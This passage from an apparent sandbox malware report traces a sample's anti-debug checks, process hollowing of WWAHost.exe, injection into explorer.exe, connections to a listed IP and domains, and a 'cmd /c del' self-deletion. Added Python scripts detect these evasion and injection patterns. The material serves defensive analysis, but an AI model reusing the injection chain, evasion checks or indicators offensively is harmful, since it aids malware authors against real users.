            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B73D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BEA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B84120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B84120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B84120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B84120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B84120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B6C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B87D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C38D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C38CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BA90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B920A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B69080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C214FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B658EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFB8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFB8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B7B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C22073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BE6C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C31074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C21C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C3740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C3740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C3740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B8746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C34015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03C34015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B80050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B80050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03BFC450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 12_2_03B9A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeCode function: 6_2_0040ACE0 LdrLoadDll,
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeMemory allocated: page read and write | page guard
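            The fs:[30h] reads in process 12, the rdtsc in 6_2_00409AA0 and the VMware strings in memory are the sandbox's dynamic evidence for the anti-debug and anti-VM checks. As an added example (not Joe Sandbox code), the Python below reproduces the same three checks statically over a byte blob: the vendor strings as ASCII and UTF-16LE, the 32-bit encodings of `mov r32, fs:[30h]` (the PEB load that precedes a BeingDebugged or NtGlobalFlag read), and rdtsc, with two rdtsc within a short window flagged as a timing check. The sample bytes are constructed, and the vbox/qemu markers are extra common strings that this report does not list.

```python
"""Static triage for the anti-analysis primitives the report lists: VM-vendor
strings, PEB access through fs:[30h], and rdtsc timing checks.
Added example; the sample bytes below are constructed, not from this sample."""
import re
from typing import List, Tuple

Finding = Tuple[int, str]  # (offset, label)

# Markers quoted in the report (VMware SVGA II, VMware Tools, NECVMWar CD-ROM,
# VMware Virtual_disk). vbox/qemu are extra common markers, not from this report.
VM_MARKERS = ("vmware", "necvmwar", "virtual_disk", "vbox", "qemu")

# 32-bit x86: 0x64 is the fs: prefix, A1 = "mov eax, moffs32",
# 8B /r with mod=00 rm=101 = "mov r32, [disp32]" for any register, 0F 31 = rdtsc.
PEB_EAX = re.compile(rb"\x64\xA1\x30\x00\x00\x00")
PEB_ANY = re.compile(rb"\x64\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D]\x30\x00\x00\x00")
RDTSC = re.compile(rb"\x0F\x31")


def find_vm_strings(blob: bytes) -> List[Finding]:
    """Case-insensitive search for VM markers, as ASCII and as UTF-16LE."""
    hits: List[Finding] = []
    low = blob.lower()  # lowercases ASCII letters only, so UTF-16LE \x00 bytes survive
    for marker in VM_MARKERS:
        for needle in (marker.encode("ascii"), marker.encode("utf-16-le")):
            start = 0
            while (pos := low.find(needle, start)) != -1:
                hits.append((pos, f"vm-string:{marker}"))
                start = pos + 1
    return sorted(hits)


def find_peb_access(blob: bytes) -> List[Finding]:
    """Every fs:[30h] load; the following instructions usually read
    BeingDebugged (PEB+2) or NtGlobalFlag (PEB+68h)."""
    hits = [(m.start(), "peb-access:mov eax,fs:[30h]") for m in PEB_EAX.finditer(blob)]
    hits += [(m.start(), "peb-access:mov r32,fs:[30h]") for m in PEB_ANY.finditer(blob)]
    return sorted(hits)


def find_rdtsc_timing(blob: bytes, window: int = 64) -> List[Finding]:
    """Report each rdtsc; two within `window` bytes are flagged as a timing check,
    since one read is just a counter and the delta is what detects single-stepping."""
    offs = [m.start() for m in RDTSC.finditer(blob)]
    hits: List[Finding] = [(o, "rdtsc") for o in offs]
    for a, b in zip(offs, offs[1:]):
        if b - a <= window:
            hits.append((a, f"rdtsc-timing-check:pair@+{b - a}"))
    return sorted(hits)


def triage(blob: bytes) -> List[Finding]:
    return sorted(find_vm_strings(blob) + find_peb_access(blob) + find_rdtsc_timing(blob))


# Constructed bytes shaped like the evidence above; not extracted from the sample.
SAMPLE = (
    b"\x55\x8B\xEC"                          # push ebp; mov ebp, esp
    + b"\x64\xA1\x30\x00\x00\x00"            # mov eax, fs:[30h]            -> PEB
    + b"\x0F\xB6\x40\x02"                    # movzx eax, byte ptr [eax+2]  -> BeingDebugged
    + b"\x0F\x31"                            # rdtsc
    + b"\x89\xC6"                            # mov esi, eax
    + b"\x90" * 10                           # filler
    + b"\x0F\x31"                            # rdtsc again: timing check
    + b"\x29\xF0"                            # sub eax, esi
    + b"\x64\x8B\x0D\x30\x00\x00\x00"        # mov ecx, fs:[30h]
    + b"\xC3"                                # ret
    + b"VMware SVGA II\x00"
    + "SOFTWARE\\VMware, Inc.\\VMware Tools".encode("utf-16-le")
)

if __name__ == "__main__":
    for off, label in triage(SAMPLE):
        print(f"{off:#06x}  {label}")
```

            Static hits are candidates only: `0F 31` is two bytes and also matches data, so the rdtsc pair and a PEB load followed by a `[eax+2]` read are what make an offset worth opening in a disassembler. The report places these checks in the unpacked stages (processes 6 and 12), not in the .NET loader, so the scan belongs on those memory dumps rather than on the file as dropped.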

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 160.153.136.3 80
            Source: C:\Windows\explorer.exeDomain query: www.sherwoodmastiff.com
            Source: C:\Windows\explorer.exeDomain query: www.kingtreemusic.com
            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeSection unmapped: C:\Windows\SysWOW64\WWAHost.exe base address: 9B0000
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeSection loaded: unknown target: C:\Windows\SysWOW64\WWAHost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\WWAHost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Injects a PE file into a foreign process
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeMemory written: C:\Users\user\Desktop\EH5ro3Hyug.exe base: 400000 value starts with: 4D5A
            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeThread register set: target process: 3424
            Source: C:\Windows\SysWOW64\WWAHost.exeThread register set: target process: 3424
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess created: C:\Users\user\Desktop\EH5ro3Hyug.exe C:\Users\user\Desktop\EH5ro3Hyug.exe
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeProcess created: C:\Users\user\Desktop\EH5ro3Hyug.exe C:\Users\user\Desktop\EH5ro3Hyug.exe
            Source: C:\Windows\SysWOW64\WWAHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\EH5ro3Hyug.exe'
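            Read together, the lines above are one injection chain: EH5ro3Hyug.exe respawns itself and writes an image starting with 4D5A at 400000, unmaps WWAHost.exe's image at 9B0000 and maps execute-read-write sections into it, both EH5ro3Hyug.exe and WWAHost.exe queue an APC or set a thread context in explorer.exe, explorer.exe then connects to 160.153.136.3:80, and WWAHost.exe spawns cmd.exe to delete the dropper. As an added example (not Joe Sandbox code and not any real EDR schema), the Python below correlates a constructed stream of such events into alerts and, for the network connection and the self-delete, walks the injector graph back to the root process, which is how activity seen in explorer.exe gets attributed to EH5ro3Hyug.exe. The event shape, field names and pids are assumptions.

```python
"""Correlate host telemetry into the injection chain the report evidences:
loader -> child (MZ written) -> WWAHost.exe (hollowed) -> explorer.exe (APC /
thread context) -> network, plus the cmd.exe self-delete.
Added example; the event schema, pids and sample events are constructed and are
not Joe Sandbox output or any real EDR format."""
import re
from collections import defaultdict
from typing import Dict, List, Set

INJECTION_EVENTS = {"memory_write", "section_unmap", "section_map",
                    "thread_set_context", "apc_queue"}

LOADER, WWAHOST = r"C:\Users\user\Desktop\EH5ro3Hyug.exe", r"C:\Windows\SysWOW64\WWAHost.exe"
EXPLORER, CMD = r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\cmd.exe"


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def trace_roots(pid: int, injected_by: Dict[int, Set[int]]) -> Set[int]:
    """Follow injector edges back to processes nobody injected into."""
    roots: Set[int] = set()
    seen: Set[int] = set()
    stack = [pid]
    while stack:
        cur = stack.pop()
        if cur in seen:
            continue
        seen.add(cur)
        parents = injected_by.get(cur, set())
        if not parents:
            roots.add(cur)
        stack.extend(parents)
    return roots


def _alert(technique: str, ev: Dict) -> Dict:
    return {"t": ev["t"], "technique": technique, "source": image_name(ev["src"]),
            "target": image_name(ev["dst"]) if "dst" in ev else ev.get("remote")}


def correlate(events: List[Dict]) -> List[Dict]:
    """Single pass in time order: record who injected into whom, raise per-event
    alerts, and attribute later behaviour of injected processes to the root injector."""
    alerts: List[Dict] = []
    injected_by: Dict[int, Set[int]] = defaultdict(set)
    path_of: Dict[int, str] = {}
    unmapped: Set[tuple] = set()  # (src_pid, dst_pid) whose image was unmapped
    for ev in sorted(events, key=lambda e: e["t"]):
        kind = ev["type"]
        path_of[ev["src_pid"]] = ev["src"]
        if "dst_pid" in ev:
            path_of[ev["dst_pid"]] = ev["dst"]
        if kind in INJECTION_EVENTS:
            injected_by[ev["dst_pid"]].add(ev["src_pid"])
        if kind == "memory_write" and ev["data"].startswith(b"MZ"):
            alerts.append(_alert("pe-image-written-into-process", ev))
        elif kind == "section_unmap":
            unmapped.add((ev["src_pid"], ev["dst_pid"]))
        elif kind == "section_map" and ev["protection"] == "RWX":
            if (ev["src_pid"], ev["dst_pid"]) in unmapped:  # unmap + RWX map = hollowing
                alerts.append(_alert("process-hollowing", ev))
            else:
                alerts.append(_alert("rwx-section-mapped", ev))
        elif kind in ("thread_set_context", "apc_queue"):
            alerts.append(_alert("thread-injection", ev))
        elif kind == "network_connect" and ev["src_pid"] in injected_by:
            a = _alert("injected-process-network", ev)
            a["roots"] = sorted(path_of[p] for p in trace_roots(ev["src_pid"], injected_by))
            alerts.append(a)
        elif kind == "process_create" and image_name(ev["dst"]) == "cmd.exe":
            cmd = ev.get("cmdline", "").lower()
            roots = trace_roots(ev["src_pid"], injected_by)
            if re.search(r"\bdel\b", cmd) and any(path_of[r].lower() in cmd for r in roots):
                a = _alert("self-deletion", ev)
                a["roots"] = sorted(path_of[r] for r in roots)
                alerts.append(a)
    return alerts


def _ev(t, kind, src_pid, src, dst_pid=None, dst=None, **extra):
    ev = {"t": t, "type": kind, "src_pid": src_pid, "src": src, **extra}
    if dst_pid is not None:
        ev.update(dst_pid=dst_pid, dst=dst)
    return ev


# Constructed events modelled on the evidence lines above; pids are made up.
EVENTS = [
    _ev(1, "process_create", 100, LOADER, 101, LOADER),
    _ev(2, "memory_write", 100, LOADER, 101, LOADER, base=0x400000, data=b"MZ\x90\x00"),
    _ev(3, "section_unmap", 101, LOADER, 102, WWAHOST, base=0x9B0000),
    _ev(4, "section_map", 101, LOADER, 102, WWAHOST, protection="RWX"),
    _ev(5, "apc_queue", 101, LOADER, 103, EXPLORER),
    _ev(6, "section_map", 102, WWAHOST, 103, EXPLORER, protection="RWX"),
    _ev(7, "thread_set_context", 102, WWAHOST, 103, EXPLORER),
    _ev(8, "network_connect", 103, EXPLORER, remote="160.153.136.3:80"),
    _ev(9, "process_create", 102, WWAHOST, 104, CMD,
        cmdline="/c del 'C:\\Users\\user\\Desktop\\EH5ro3Hyug.exe'"),
]

if __name__ == "__main__":
    for a in correlate(EVENTS):
        print(a)
```

            The point of keeping the injector graph rather than alerting per event is the last two alerts: on its own, explorer.exe reaching an IP on port 80 or WWAHost.exe running `cmd /c del` is noise, but once both processes have an injection edge leading back to a binary under C:\Users, the connection and the deletion are attributed to that binary. The hollowing rule also shows why the sandbox distinguishes WWAHost.exe from explorer.exe here: only WWAHost.exe has its image unmapped before the RWX map, while explorer.exe receives new sections and an APC without losing its own image.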
            Source: explorer.exe, 00000007.00000000.725053158.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 00000007.00000000.710602516.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000C.00000002.936222094.00000000051D0000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000007.00000000.710602516.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000C.00000002.936222094.00000000051D0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.710602516.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000C.00000002.936222094.00000000051D0000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.710602516.0000000001080000.00000002.00020000.sdmp, WWAHost.exe, 0000000C.00000002.936222094.00000000051D0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000000.717543897.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Users\user\Desktop\EH5ro3Hyug.exe VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\EH5ro3Hyug.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
